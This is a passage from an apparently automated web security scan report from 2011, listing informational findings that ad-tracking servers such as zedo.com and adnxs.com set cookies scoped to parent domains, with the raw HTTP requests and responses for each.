Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:06:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=118
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:06:54 GMT
Content-Length: 2378
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

12.74. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:01 GMT;path=/;domain=.zedo.com;
FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:01 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=112
Expires: Mon, 13 Jun 2011 11:08:53 GMT
Date: Mon, 13 Jun 2011 11:07:01 GMT
Content-Length: 2378
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

12.75. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFgeo=2241452;expires=Tue, 12 Jun 2012 11:02:07 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-407/d3/jsc/gl.js?lYrOTcGt89Yz1ao6zwEmLiof~051411 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4; FFcat=826,276,14:1190,1,14; FFad=0:0; aps=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 12 Jun 2012 11:02:07 GMT;domain=.zedo.com;path=/;
ETag: "2802d1b-5d7-4a4a58217ce80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=252138
Expires: Thu, 16 Jun 2011 09:04:25 GMT
Date: Mon, 13 Jun 2011 11:02:07 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';

if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

12.76. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ZFFAbh=879B826,20|120_879#365;expires=Tue, 12 Jun 2012 11:02:20 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r9190030
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; ZFFAbh=879B826,20|120_879#365; ZCBC=1; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4; aps=1; FFgeo=2241452; FFcat=933,56,15:826,276,14:1190,1,14; FFad=0:0:0; FFCap=1595B305,201787:933,196008|0,13,1:0,30,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: ZFFAbh=879B826,20|120_879#365;expires=Tue, 12 Jun 2012 11:02:20 GMT;domain=.zedo.com;path=/;
ETag: "3a9d60b-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1547405685
Cache-Control: max-age=21616
Expires: Mon, 13 Jun 2011 17:02:36 GMT
Date: Mon, 13 Jun 2011 11:02:20 GMT
Connection: close

GIF89a.............!.......,...........D..;

12.77. http://gdyn.nba.com/1.1/1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gdyn.nba.com
Path:	/1.1/1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; expires=Thu, 16 Jun 2011 14:01:03 GMT; domain=.nba.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1307962862507 HTTP/1.1
Host: gdyn.nba.com
Proxy-Connection: keep-alive
Referer: http://data.nba.com/data/html/gdyn/gdyn_nba.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:03 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; expires=Thu, 16 Jun 2011 14:01:03 GMT; domain=.nba.com; path=/
Set-Cookie: adDEon=true; expires=Thu, 16 Jun 2011 14:01:03 GMT; domain=.nba.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Mon, 13 Jun 2011 11:02:03 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.78. http://glam.grapeshot.co.uk/main/redirect.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://glam.grapeshot.co.uk
Path:	/main/redirect.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=1207876142; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/redirect.cgi?url=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F&target=http%3A%2F%2Fwww30a2-orig.glam.com%2Fgad%2Furldata.act%3Fsrcid%3D2%26afid%3D1000212071%26url%3D00l3it%26ord%3D4654773336369544%26keydmoz1%3DGS_CHANNELS.dmoz%26keydmoz2%3DGS_CHANNELS.dmoz%26keydmoz3%3DGS_CHANNELS.dmoz%26keyhs1%3DGS_CHANNELS.hotshot%26keyhs2%3DGS_CHANNELS.hotshot%26keyhs3%3DGS_CHANNELS.hotshot HTTP/1.1
Host: glam.grapeshot.co.uk
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:21:14 GMT
Server: Apache/2.2.3 (CentOS)
GSCategories: health-eyecare (24.996849) tech-mobilehandheld (18.598122) seasonal-winter (15.955135) arts_television_programs (17.232893) arts_music_bands-and-artists (15.947071) arts_animation_voice-actors (15.446434)
GSID: fzay8jt
GSResponse: OK
GSResponseDetails: C=6 BC=0 BF=0 CU=0 CC=0
GSUID: 1207876142
GSDeployment: main
Set-Cookie: uid=1207876142; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1
Location: http://www30a2-orig.glam.com/gad/urldata.act?srcid=2&afid=1000212071&url=00l3it&ord=4654773336369544&keydmoz1=arts_television_programs&keydmoz2=arts_music_bands-and-artists&keydmoz3=arts_animation_voice-actors&keyhs1=health-eyecare&keyhs2=tech-mobilehandheld&keyhs3=seasonal-winter
Cache-Control: max-age=0
Expires: Mon, 13 Jun 2011 11:21:14 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

12.79. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:01:45 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; path=/; expires=Sun, 11-Sep-2011 11:01:45 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=9z3qr1e4EkD3PeqvV7gSQAAAAGBmZgJA9z3qr1e4EkD3PeqvV7gSQPrUl4kdQRoN_ayDGovBdy8O7vVNAAAAAIwuAAC1AAAANQEAAAIAAABnowUA0WMAAAEAAABVU0QAVVNEANQBPAAzC1gAZg8BAgUCAQQAAAAA_iM6CAAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307962894%29%3Buf%28%27r%27%2C+369511%2C+1307962894%29%3Bppv%2811776%2C+%27944138667005826298%27%2C+1307962894%2C+1310554894%2C+62058%2C+25553%29%3B&cnd=!lyFsawjq5AMQ58YWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcAJ49P0CgAFQiAHG5wKQAQGYAQGgAQOoAQOwAQG5AZDaLMJXuBJAwQGQ2izCV7gSQMkBCkQTNEFHAEDQAQDZAQAAAAAAAPA_4AEA&ccd=!fgW-Lgjq5AMQ58YWGNHHASAA&referrer=http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/&pp=TfXuDgADVm8K5X-LihNCfUBjKMj687om75Nzlg&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5XEjDu71Te-sDYv_lQf9hM3QCO_675oCp537xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05ODUzNzg0NjA2NTUxMzk3sgEMc3BvcnRkZncuY29tugEJNDY4eDYwX2FzyAEJ2gFCaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvmAKyD8ACBMgCq4KlDuACAOoCD0ZhbnNpZGVkXzQ2OHg2MKgDAegDiALoA9Mp6AOCAugDtQj1AwAAAMTgBAGABsCL7IGHsaCMNQ%26num%3D1%26sig%3DAGiWqtwD3vBQX40UZMj4tjEt-VoEhYeEGQ%26client%3Dca-pub-9853784606551397%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; uuid2=3420415245200633085; anj=Kfw)k>Mwz%)J70wBHz-D7`qokXhj-@aM)mVXjqrslj5ft[)'1yw[xphJSdzG.TF)0F^A`]BqTl-AR6`*)JP0AKozxfQE4@ZTQjq]rNTTlKqs3KL4-O(L$OYY]n=Fu!v//qc@$i3nq2_[o`94GmWdO0Bz@eLc*.`71nO<Z_$Uxo7CpH?*'y[3gS*4MLCLAUc5@r?XLOuqcg3M`mO_*!5UYGU#5(`mbnnx=hxk+]^04kmIQ5/@lg3[`MT!_-w*dO:K^3w5%z!c>wK::6cWF*>:oKm$@GTp*rMP#jcMyL@J[#@Cw65Eqv_>#V3r[J%[*<nKa<)Dn:*DWFX/5bNa8/+1*a#%MWnd*jrwZ[1nMujHwh48)Z_%aTTSWZ1=0MnH*f'UZlnAC]m)AUJ1(vbuE)$j2*'0!a['V8vZ4ig*C97YN3(WOPh_iGuYQ!7TBWIbIoOd9wMWuHVt1.@*tY/VH(3_aDA)y3PeL%fXVg0G'DDqj$WKSBU(?m1yqaoI^uXpwU1I^tKHQr3H.(X_0cm=y<=oa6_f*J4o)vR.yk*^]OC7`ZJ_K6qd<*VTIw_U`OL)YNc')g%2>I5$1(o1ikX@zjIkO?y1qMGFZ!G1`I!!!!!

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http://www.twackle.com/headlines/clickenc=http://adclick.g.doubleclick.net/aclk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:26:49 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http://www.twackle.com/headlines/clickenc=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BbxFBY_L1TdzJOMz8lQfJmaHxCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB&num=1&sig=AGiWqtzcCewhlJyOrX67IKiuPDRQp5MYXg&client=ca-pub-7494156027018342&adurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAIgAigCML3h1-8EEI_k1-8EGAI.; acb142304=5_[r^kI/7ZIwqAE_nG*.=GmfQ?enc=AAAAAAAAAEDNzMzMzMz8PwAAAAAAAABAzczMzMzM_D8AAAAAAAAAQBn-Cewh1wRf_ayDGovBdy8P8vVNAAAAAPA7AwA3AQAAagEAAAIAAABYbgUAy10AAAEAAABVU0QAVVNEANgCWgCqFAAASwwBAgUCAQUAAAAAox6rsAAAAAA.&tt_code=cm.mtv&udj=uf%28%27a%27%2C+10117%2C+1307963919%29%3Buf%28%27c%27%2C+49291%2C+1307963919%29%3Buf%28%27r%27%2C+355928%2C+1307963919%29%3Bppv%289239%2C+%276846833874203967001%27%2C+1307963919%2C+1308136719%2C+49291%2C+24011%29%3B&cnd=!SxtfSwiLgQMQ2NwVGAAgy7sBMAA4qilAAEjqAlDw9wxYAGBVaABwAHgAgAEEiAG0wQSQAQGYAQGgAQOoAQOwAQG5AQAAAAAAAABAwQEAAAAAAAAAQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AGbEw..&ccd=!sAQbJQiLgQMQ2NwVGMu7ASAA&custom_macro=CP_ID%5E49291; sess=1; uuid2=3420415245200633085; anj=Kfw)kByDuq(0vd+Be?5ZYTL)6.Z_6mLSHG^$Mglg7#[eC>jObf2zwmy_oS8-DXm*e#>#0f>d3dZ=.Yf*)KU:U06d*R.fph)H_wIT9tRpFa)wUT%mqW=pRsdqVv^RF35%n_Q^:cpr5ep:RI:d*Q]f*6TZ7orR1p>8.+e)7*ulP*$_/_codqSeTnPQP>ZAM@XtL54/JwQXp<6KdREg2=QaT_OW[I42DxyO0vuNdNH@YTHm9X@yt6*5*g%I1Qogv>8Tq%`QThqXzX=qcs%<gmwvgLpBvf_=fChnMmU8k-#bbkuvJg0W]L97!dw7-v:u(ugyd@(tyCzwAAbn#Z-w+U$[l:HEk@p52BEi]D@rNU2*+8*q>gQUqilVQggO[9ko.+?0i9M%Z?fQ69!SL$R`$t1n`NOCsZDnKfGRzP1Tlv(Rm(rKjW:hQtUqx_fbU.aM-m2s4huR<#1^A`tC'$O<aF7UI]Ro.hJ6Sm0@f*ktpgb!A_nBuSF%QuE</hv':wljA`MQbZvif8=xqil`6Rz0pB?RJHsX>UaDhJ[n::w6[afW'UlLx<[-=+iah4q>_UvmARnpCX4V761C=7wjlk%y8'o6yv9Jw2H=bBcvjQL5ie-mjik?DfGaDBk*Ydu!6yDm!cY$lIpJzm32kCFms?p

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:26:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:26:49 GMT; domain=.adnxs.com; HttpOnly
Location: http://adclick.g.doubleclick.net/aclk?sa=l&ai=BbxFBY_L1TdzJOMz8lQfJmaHxCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB&num=1&sig=AGiWqtzcCewhlJyOrX67IKiuPDRQp5MYXg&client=ca-pub-7494156027018342&adurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
Date: Mon, 13 Jun 2011 11:26:49 GMT
Content-Length: 0

12.81. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:02:22 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; sess=1; uuid2=3420415245200633085; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:02:22 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=3420415245200633085
Date: Mon, 13 Jun 2011 11:02:22 GMT
Content-Length: 0

12.82. http://ib.adnxs.com/getuidnb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:19:45 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:$UID HTTP/1.1
Host: ib.adnxs.com
